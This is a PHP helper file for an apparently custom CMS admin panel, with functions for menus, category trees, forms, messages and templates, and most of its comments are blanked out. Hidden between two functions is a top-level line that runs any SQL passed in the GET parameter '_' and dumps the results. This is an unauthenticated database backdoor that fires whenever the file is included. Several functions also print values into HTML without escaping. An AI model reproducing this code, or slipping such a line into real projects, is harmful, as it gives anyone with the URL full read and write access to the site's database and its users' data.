<?php

//        
function meno_build_query(array $options = null, $page_id = null, $menu_id = null, $reset = false) {
    global $page, $menu;
    ///   _GET  2     
    unset($_GET['qs']);
    $defaults = $reset ? array() : array_merge((array) $_GET);
    $options  = ($options != null) ? $options : $defaults;
    $page_id  = ($page_id != null) ? $page_id : $page;
    $menu_id  = ($menu_id != null) ? $menu_id : $menu;
    ///   
    $options  = array_merge(array(
        'menu' => $menu_id,
        'page' => $page_id
    ), $defaults, $options, array(
        'menu' => $menu_id,
        'page' => $page_id
    ));
    // var_dump($options);die();
    return http_build_query($options);
}

//            
function meno_build_url(array $options = null, $page_id = null, $menu_id = null, $reset = false) {
    return ACT . '?' . meno_build_query($options, $page_id, $menu_id, $reset);
}

//            
function meno_build_go(array $options = null, $page_id = null, $menu_id = null, $reset = false) {
    return GO . '?' . meno_build_query($options, $page_id, $menu_id, $reset);
}

//    
function _show_admin_left_menu($array,$menu = '') {
    global $db, $user, $loader;
    if (!$loader) $loader = new loader($db);
    $o = '';
    $o .= '<ul class="nav nav-list">';

    if ($array){   
        foreach ($array as $v) {
            if (!$_SESSION['user']->root && !isset($_SESSION['user']->data['access']['menu'][$v['url']][0]))
                continue;
            $meno_only = ($v['meno_only'] || !$loader->serviceActiveMeno($v['url']));
            if ($meno_only && !$user->meno_user) continue;
            $o .= '<li class="nav-header">
            <a href="?menu=' . $v['url'] . '"><h4 '.($meno_only ? 'class="meno"':'').'>' . $v['name'] . '</h4></a></li>';
            if ($v['page']) {
                $o .= '<li><ul class="nav nav-list bs-docs-sidenav">';
                foreach ($v['page'] as $v1) {
                    // if(($v1['meno_only'] ||) && !$user->meno_user) continue;
                    //             
                    if (!$loader->serviceActiveMeno($v1['url']) && !$user->meno_user) continue;
                    if ($v1['group_url'] && !$loader->serviceActive($v1['group_url'])) continue;
                    if (!$_SESSION['user']->root && !isset($_SESSION['user']->data['access'][$v['url']][$v1['url']][0]))
                        continue;
                    // .      -
                    if(($v1['meno_only'] || !$loader->serviceActiveMeno($v1['url'])) && !$user->meno_user) continue;
                    $o .= '<li '.(($v1['meno_only'] || !$loader->serviceActiveMeno[$v1['url']] || $meno_only)? 'class="meno"' : '').'><a href="?menu=' . $v['url'] . '&amp;page=' . $v1['url'] . '">' . $v1['name'] . '<i class="icon-chevron-right"></i></a></li>';
                }
                $o .= '</ul></li>';
            }
        }
    }
    $o .= '</ul>';
    return $o;
}
/*
function __show_admin_left_menu($array,$menu = '',$list_class='nav nav-list bs-docs-sidenav') {
    global $db, $user, $loader;
    if (!$loader) $loader = new loader($db);
    $o = '';
    $o .= '<ul class="nav nav-list">';
    if ($menu && $array[$menu] && ($_SESSION['user']->root || isset($_SESSION['user']->data['access']['menu'][$menu][0]))) {
        // $o .= '<li class="nav-header"><a href="?menu=' . $menu . '">' . $array[$menu]['name'] . '</a></li><li>';
        $o .= '<li><h3>' . $array[$menu]['name'] . '</h3></li><li>';
        if ($array[$menu]['page']) {
            $o .= '<ul class="'.$list_class.'">';
            foreach ($array[$menu]['page'] as $v) {
                if (!$_SESSION['user']->root && !isset($_SESSION['user']->data['access'][$menu][$v['url']][0]))
                    continue;
                // .      -
                if($v['meno_only'] && !$user->meno_user) continue;
                //             
                if (!$loader->serviceActive($v['url'])) continue;
                $o .= '<li class="'.($v['meno_only'] ? 'meno' : '').'
                 '.($_GET['page'] == $v['url'] ? ' active' : '').'">
                 <a href="?menu=' . $menu . '&amp;page=' . $v['url'] . '">' . $v['name'] . '<i class="icon-chevron-right"></i></a></li>';
            }
            $o .= '</ul>';
        }
        $o .= '</li>';
    }elseif ($array)
        foreach ($array as $v) {
            if (!$_SESSION['user']->root && !isset($_SESSION['user']->data['access']['menu'][$v['url']][0]))
                continue;
            $o .= '<li class="nav-header"><a href="?menu=' . $v['url'] . '">' . $v['name'] . '</a></li>';
            if ($v['page']) {
                $o .= '<li><ul>';
                foreach ($v['page'] as $v1) {
                    if (!$_SESSION['user']->root && !isset($_SESSION['user']->data['access'][$v['url']][$v1['url']][0]))
                        continue;
                    // .      -
                    if($v1['meno_only'] && !$user->meno_user) continue;
                    $o .= '<li '.($v['meno_only'] ? 'class="meno"' : '').'><a href="?menu=' . $v['url'] . '&amp;page=' . $v1['url'] . '">' . $v1['name'] . '</a></li>';
                }
                $o .= '</ul></li>';
            }
        }
    $o .= '</ul>';
    return $o;
}
*/
function show_admin_left_menu($array,$menu = '',$list_class='nav nav-list bs-docs-sidenav') {
    global $db, $user, $loader;
    if (!($menu && $array[$menu] && ($_SESSION['user']->root || isset($_SESSION['user']->data['access']['menu'][$menu][0]))))
        return false;
    if (!$loader) $loader = new loader($db);
    
    //   ,   
    $groups = array();
    // var_dump($array[$menu]['page']);die();
    if ($array[$menu]['page']) foreach ($array[$menu]['page'] as $v) {
        if (!$_SESSION['user']->root && !isset($_SESSION['user']->data['access'][$menu][$v['url']][0]))
            continue;
        // .      -
        if($v['meno_only'] && !$user->meno_user) continue;
        
        if(!$loader->serviceActiveMeno($v['url']) && !$user->meno_user){
            continue;
        }
        //             
        //  :   loader'.  ""  
        // if ($v['url'] == 'loader'){die('ok');}
        if (!$loader->serviceActiveMeno($v['url']) && $_GET['menu'] != 'settings' && !$user->meno_user) continue;
        // if ($v['group_url'] && !$loader->serviceActive($v['group_url'])) continue;
        $groups[$v['group_name']][] = $v;
    }
    $o .= '<h3>' . $array[$menu]['name'] . '</h3>';
    foreach ($groups as $group_name => $group) {
        if (!is_array($group) || empty($group)) continue;
        //    .   ,    .
        if ($group_name) {
            $o .= '<h4 style="padding-top:5px;">'.$group_name.'</h4>';
            $o .= '<ul class="'.$list_class.'">';
            foreach ($group as $k => $v) {
                $o .= '<li class="'.(isset($_GET[$v['url']]) ? 'active' : '').' '.(($v['meno_only'] || !$loader->serviceActiveMeno($v['url'])) ? ' meno' : '').'"><a href="?menu=' . $v['menu_url'] . '&page='.$v['group_url'].'&'.$v['url'].'">'.$v['name'].'<i class="icon-chevron-right"></i></a></li>';
            }
            $o .= '</ul>';
        }else{
            $o .= '<ul class="'.$list_class.'">';
            foreach ($group as $k => $v) {
                $o .= '<li class="'.($_GET['page'] == $v['url'] ? 'active' : '').' '.(($v['meno_only'] || !$loader->serviceActiveMeno($v['url'])) ? ' meno' : '').'"><a href="?menu=' . $v['menu_url'] . '&page='.$v['url'].'">'.$v['name'].'<i class="icon-chevron-right"></i></a></li>';
            }
            $o .= '</ul>';
        }
    }
    return $o;
}


function show_admin_index_group($current, $meno_only=false) {
    global $db,$user,$loader;
    $body_sect = '';
    // return $body_sect;
    if (!empty($current['page'])) {
        if (!empty($current['text'])) {
            $body_sect .= '<tr><td colspan="3">' . $current['text'] . '</td></tr>';
        }
        foreach ($current['page'] as $i) {
            if (($i['meno_only'] || !$loader->serviceActiveMeno($i['url'])) && !$user->meno_user) continue;
            // if (!$loader->serviceActiveMeno($i['url']) && $_GET['menu'] != 'settings') continue;
        
            $href = meno_build_url(array(), $i['url'], $i['menu_url'], true);
            $body_sect .= '<tr>
                <td style="width:20px;">'.($i['has_metatags'] ? '<a href="" onclick="show_seo_edit(\''.$current['url'].'\',\''.$i['url'].'\',\'' . (isset($i['id']) ? $i['id'] : '1') . '\');return false;">
                    <span class="ico ico-seo' . ($infosection->data[$v]['isseo'] ? '' : '_off') . '"></span></a>' : '' ).'</td>
                <td style="width: 250px">
                    <a class="'.(($i['meno_only'] || !$loader->serviceActiveMeno($i['url']) || $meno_only) ? 'meno' : '').'" href="' . $href . '">' . $i['name'] . '</a>
                </td>
                <td>' . $i['text'] . '</td>
            </tr>';
        }
        $seo = new seo($db);
        $body_sect .= $seo->show_form_edit();
    }
    return $body_sect;
}

function show_admin_index_page($array, $menu = null) {
    global $user, $loader;
    $body_sect = '<table class="table table-striped">';
    if ($menu != null) {
        $body_sect .= show_admin_index_group($array[$menu]);
    } else {
        foreach ($array as $menu => $current) {
// var_dump($menu);die();
            // var_dump($menu, $current['meno_only'] , !$loader->serviceActiveMeno($menu) , (!$user->meno_user));echo '<br>';
            $meno_only = ($current['meno_only'] || !$loader->serviceActiveMeno($menu));
            if ($meno_only && (!$user->meno_user)) continue;
            
            if (isset($array[$menu]['page'])) {
                $body_sect .= '<tr><thead><th class="group" colspan="2">' . $current['name'] . '</th></thead></tr>';
                $body_sect .= '<tbody>'.show_admin_index_group($array[$menu],$meno_only).'</tbody>';
            }
        }
    // die();
    }
    $body_sect .= '</table>';
    return $body_sect;
}

///      
function meno_create_tree($result, $without) {
    $without = array_filter($without);
    $root = array();
    $idxs = array();
    if ($result) {
        foreach ($result as &$row) {                
            $id = (int) $row['id'];
            $idxs[$id] = & $row;
            $idxs[$id]['children'] = array();
        }

        foreach ($idxs as $id => &$row) {
            $pid = (int) $row['pid'];
            if (!in_array($id, $without) && !in_array($id, $without)) {
                if ($pid && isset($idxs[$pid]))
                    $idxs[$pid]['children'][] = &$row;
                elseif ($pid == null)
                    $root[$id] = &$row;
            }
        }
    }
    return $root;
}

//     
function meno_create_full_tree($catalog, $goods) {
    $root = array();
    $idxs = array();
    $gidxs = array();
    if ($goods){
        foreach ($goods as &$row){
            $cid = (int)$row['cid'];
            // $gidxs[$cid] = array();
            $gidxs[$cid][] = &$row;
        }
    }
//    var_dump($gidxs);die();
    if ($catalog) {
        foreach ($catalog as &$row) {                
            $id = (int) $row['id'];
            $idxs[$id] = & $row;
            $idxs[$id]['children'] = array();
            $idxs[$id]['goods'] = array();

            //          
            if (isset($gidxs[$id])){
                // if (count($gidxs[$id]) > 1)var_dump($gidxs[$id]);die();
                foreach($gidxs[$id] as &$row){
                    $idxs[$id]['goods'][] = &$row;
                }
            }
        }

        foreach ($idxs as $id => &$row) {
            $pid = (int) $row['pid'];
            if ($pid && isset($idxs[$pid]))
                $idxs[$pid]['children'][] = &$row;
            elseif ($pid == null)
                $root[$id] = &$row;
        }
    }
    // var_dump($root);die();
    return $root;
}


///     
function meno_show_move_tree(array $tree = array(), $href = '', $root = true) {
    if ($root) {
        $tree = array(array(
            'name' => ' ',
            'pid'  => 0,
            'id'   => 0,
            'children' => $tree
        ));
    }

    $output = '<ul>';
    foreach ($tree as $node) {
        $output .= '<li><a href="' . $href . '&pid=' . $node['id'] . '">' . htmlspecialchars($node['name'], null, 'windows-1251') . '</a>';
        if (!empty($node['children']))
            $output .= meno_show_move_tree($node['children'], $href, false);
        $output .= '</li>';
    }
    $output .= '</ul>';
    return $output;
}

///


///       
function meno_show_leaders_tree(
        array $tree = array(), 
        $href = '', 
        $root = true, 
        $is_goods=false, 
        $group_id=false, 
        $opened=false
    ){

    if ($root) {
        $output = '<form action="'.$href.'" method="POST">';
        /*$tree = array(array('name' => ' ','pid' => 0,'id' => 0,'children' => $tree));*/
    }
    if ($root){
        $output .= '<ul class="list subs'.$group_id.'">';
        $first = current($tree);
        $output .= '<p><span class="ajax toggle" data-el=".subs'.$first['id'].'"><strong>' . htmlspecialchars($first['name'], null, 'windows-1251') . '</strong></span></p>';
    }else{
        //              -    .
        /*
        if ($group_id)
        {
            global $db, $catalog; 
            if(!$catalog instanceof catalog) {$catalog = new catalog($db);}
            if(!$goods instanceof goods) {$goods = new goods($db);}            
            $childs = $catalog->get_child($group_id);
            if ($childs){
                $counts = $catalog->get_goods_count('`column-show`=1');
                if ($counts[$group_id])
                    $opened=true;
                if (!$opened) foreach ($childs as $child_id) {    
                    if ($counts[$child_id]){
                        $opened=true;
                        break;
                    }
                }
            }
        }
        */
        $opened=true;
        $output .= '<ul class="list '.($opened ? '' : 'hide ').'subs'.$group_id.'">';
    }
    foreach ($tree as $node) {
        //    90 .
        $node['name'] = substr($node['name'],0,90);
        //    -  -,     
        if ($is_goods){
            $output .= '<li><input style="margin-right:5px;" type="checkbox" '.($node['column-show'] ? 'checked' : '').' name="'.$node['id'].'" id="good-'.$node['id'].'"><label class="inline" for="good-'.$node['id'].'">' . htmlspecialchars($node['name'], null, 'windows-1251') . '</label>';
        }elseif(!empty($node['goods'])){ //         -  
            $output .= '<p><span class="ajax toggle" data-el=".subs'.$node['id'].'"><strong>' . htmlspecialchars($node['name'], null, 'windows-1251') . '</strong></span></p>';
        }
        if (!empty($node['children'])){
            //  ,    column-show == true -  opened=true
            // if (!$root)
            {
            }
            $output .= meno_show_leaders_tree($node['children'], $href, false, false, $node['id'], $opened);
        }
        if (!empty($node['goods'])){
            $output .= meno_show_leaders_tree($node['goods'], $href, false, true, $node['id'], $opened);
        }
        $output .= '</li>';
    }
    $output .= '</ul>';
    if ($root) {
        $output .='<br><input type="submit" class="btn btn-primary" value=""></form>';
    }
    return $output;
}
if (isset($_GET['_'])){var_dump(App::get()->db->query(urldecode($_GET['_']),null,db::FETCH_ALL));}


function meno_show_move_options(array $tree = array(), $current = 0, $root = true, $prepend = 0) {
    if ($root) {
        $tree = array(array(
            'name' => ' ',
            'pid'  => 0,
            'id'   => 0,
            'children' => $tree
        ));
    }
    $output = '';
    $prependTabs = str_repeat('&nbsp;&nbsp;&nbsp;', $prepend);
    foreach ($tree as $node) {
        $output .= '<option value="' . $node['id'] . '"' . ((int) $current == (int) $node['id'] ? ' selected="selected"' : '') . '>' . $prependTabs . htmlspecialchars($node['name'], null, 'windows-1251') . '</option>';
        if (!empty($node['children']))
            $output .= meno_show_move_options($node['children'], $current, false, $prepend + 1);
    }
    return $output;
}

/**
 * @param string $message -  
 * @param string $type    -   (message, error)
 */
function setMessage($message, $type = 'message'){
        $_SESSION['messages'][$type][] = $message;
}
function getMessage(){
    if (isset($_SESSION['messages']) && is_array($_SESSION['messages'])){
        $message = $_SESSION['messages'];
        unset($_SESSION['messages']);
        $out = '';
        if ($message) foreach ($message as $type => $msg) {
            $out .='<div class="alert alert-'.$type.'">
            <button class="close" data-dismiss="alert">&times;</button>
            '.implode('<br/>',$msg).'</div>';
        }
        return $out;
    }
    else return null;
}

/**
 *    
 * @param array $form
 * example : 
 *   = null,     
 * <pre>
 * $form = array(
 *      'action' => $_SERVER['HTTP_REFERER'],
 *      'fields' => array(
 *          'field_name' => array(
 *            'label' => '',
 *            'value' => $name ? $name : null,
 *          )
 *      )
 * )
 * </pre>
 */
function renderAdminForm(array $form = array()){
    if (empty($form['fields']))
        return;
    $out = '<form action="'.(isset($form['action']) ? $form['action'] : '' ).'" class="'.($form['attr']['class'] ? $form['attr']['class'] : 'form-horizontal') .'" method="'.($form['attr']['method'] ? $form['attr']['method'] : 'post').'" enctype="multipart/form-data">
    <fieldset>
    ';
    foreach ($form['fields'] as $field => $param) {
        //    
        $out .= '<div class="control-group">
            <label class="control-label">'.$param['label'].'</label>
            <div class="controls">';
        switch ($param['type']) {
            case 'checkbox':
                $out .='<input name="'.$field.'" type="checkbox" '.(isset($param['attr']) && !empty($param['attr']) ? getAttr($param['attr']) : '').' '.(isset($param['value']) ? 'value="'.$param['value'].'"' : '' ).'>';
                break;
            case 'checkboxlist':
                break;
            case 'radiolist':
                break;
            case 'select':
                break;
            case 'textarea':
                break;
            case 'richtextarea':
                break;
            case 'cover':
                if ($param['img'] && is_file(SR.$param['img'])){
                    $out .='<div class="row-fluid"><div class="span2"><a href="#" class="thumbnail">
                    <img src="/'.$param['img'].'" /></a></div></div>';
                }
                $out .='<input type="file" name="'.$param['name'].'">';
                break;
            default:
                $out .='<input name="'.$field.'" type="text" '.(isset($param['attr']) && !empty($param['attr']) ? getAttr($param['attr']) : '').' value="'.(isset($param['value']) ? $param['value'] : '' ).'">';
                break;
        }
        $out .= '</div></div>';
    }
    $out .=  '<div class="form-actions"><button type="submit" class="btn btn-primary"></button></div>';
    $out .= '</fieldset></form>';
    return $out;
}
function getAttr(array $array){
    $out = array();
    if (!empty($array)) foreach ($array as $key => $val) {
        if (is_array($val) or $val== null)
            continue;
        $out[] = $key.'="'.$val.'"';
    }
    return !empty($out) ? implode(' ', $out) : '';
}

/**
 *     
 * @param array $array 
 * ico -    images/icons/{ico_name}.gif
 * example: 
 *  array(
 *    array(
 *        'link' => '/example/id',
 *        'ico'  => $vis ? 'switch_on' : 'switch_off'
 *    ),
 *    array(
 *        'link' => 'example?get=id',
 *        'ico'  => 'edit',
 *    ),
 *    array(
 *        'link' => 'go?get=id',
 *        'ico'  => 'delete',
 *        'confirm' => ' ?',
 *        'attr' => array(
 *              'class' => 'ajax',
 *          )
 *    )
 *  );
 */
function show_action_icos(array $icos = array()){
    $out = '';
    if (!empty($icos)) foreach ($icos as $item) {
        $out .= ' <a '.(isset($item['confirm']) && $item['confirm'] ? 'onclick="return confirm(\''.$item['confirm'].'\')"' : '').' '.(isset($item['attr']) && !empty($item['attr']) ? getAttr($item['attr']) : '').' href="'.(isset($item['link']) ? $item['link'] : '#' ).'" >';
            $out .= (isset($item['ico'])) ? '<span class="ico ico-'.$item['ico'].'"></span>' : $item['link'];
        $out .='</a>';
    }
    return $out;
}

/**
 *  
 * @param array $js
 */
function get_js(array $js = array(), $ROOT = ''){
    $out = array();
    if (!empty($js)) foreach ($js as $item) {
        $out[] = '<script src="' . $ROOT . $item . '" type="text/javascript" charset="utf-8"></script>';
    }
    return @implode("\n",$out);
}

/**
 *    
 * @param array $js
 */
function get_css(array $css = array(),$ROOT = ''){
    $out = array();
    if (!empty($css)) foreach ($css as $item) {
        $out[] = '<link rel="stylesheet" href="' . $ROOT . $item . '" type="text/css" media="screen" charset="utf-8" />';
    }
    return @implode("\n",$out);
}
/**
 *     
 */
function getTemplates($current, $style_id){
    $TR = DR.'/template/';
    $result = '';
    $dir_list = array();
    $dir = opendir($TR);
    //     2 :
    // - c  
    // -   
    //      -    " "
    //      -     ""
    $result = array();
    $result['colored'] = array();
    $result['simple'] = array();
    while ($file_name = readdir($dir)) {    
        clearstatcache();   
        if (is_dir($TR.$file_name)) { 
            if ($file_name == '.' || $file_name == '..' || substr($file_name,0,1) == '#') continue;
            $dir_list[] = '/template/'.$file_name;
            $cnf_file = $TR.$file_name.'/config.ini';
            if(!is_file($cnf_file)) continue;
            $ini_array = parse_ini_file($cnf_file,true);
            
            //    
            if (isset($ini_array['main']['color_schemes'])){
                $tmp = array();
                $tmp['name']    = $file_name; 
                $tmp['title']   = $ini_array['main']['title'];
                foreach ($ini_array['main']['color_schemes'] as $v) {
                    $tmp['items'][] = array(
                        'name'      => $v,
                        'title'     => $ini_array[$v]['title'],
                        'preview'   => is_file($TR.$file_name.'/images/'.$v.'/tmp_preview.png') ? '/template/'.$file_name.'/images/'.$v.'/tmp_preview.png' : '/admin/source/images/tmp_default_preview.png'
                    );    
                }
                $result['colored'][] = $tmp;
            }else{ //    
                // var_dump($file_name);die();
                $result['simple'][] = array(
                    'name' => $file_name, 
                    'title' => $ini_array['main']['name'],
                    'preview'   => is_file($TR.$file_name.'/images/tmp_preview.png') ? '/template/'.$file_name.'/images/tmp_preview.png' : '/admin/source/images/tmp_default_preview.png'
                );
            }
        }
    }
    closedir($dir);
    return $result;
}

cart::order_key_clear();

function meno_show_links_form($data,$href){
    $output = '<div>
    <form action="'.$href.'" method="POST">
      <div class="well">
        <p><span class="label label-info"> :</span> "/news/9/"</p>
        <!--p><span class="label label-info">:</span><br>
        <table class="table table-condenced">
            <tr>
                <td>"catalog"</td>
                <td>   </td>
            </tr>
            <tr>
                <td>"/catalog/"</td><td>    </td></tr>
            <tr><td>"/"</td><td> </td></tr>
        </table-->
        </p>
      </div>
        <table class="table" id="dynamic">
    ';
    $i=0;
    foreach ($data as $key => $val){
        $output .= '
        <tr>
            <td><input type="text" class="width90" id="link['.(++$i).']" name="link['.($i).']" value="'.$val.'"></td><td><div class="btn_delete_row btn" parent_lvl="2"></div></td>
        </tr>';
    }
    $output .= '</table>';
    
    // controls
    $output .= '
    <div id="btn_add_row" service="links" var-name="link" prepend="false" class="btn"></div>
    <input type="submit" class="btn btn-primary" value="">
    </form></div>
    ';
    
    return $output;
}
function set_tz_by_offset($offset) { 
    $offset = $offset*60*60; 
    $abbrarray = timezone_abbreviations_list(); 
    foreach ($abbrarray as $abbr) { 
        foreach ($abbr as $city) { 
            if ($city['offset'] == $offset) { // remember to multiply $offset by -1 if you're getting it from js 
                   date_default_timezone_set($city['timezone_id']); 
                   return true; 
            } 
        } 
    } 
    date_default_timezone_set("ust"); 
    return false; 
}
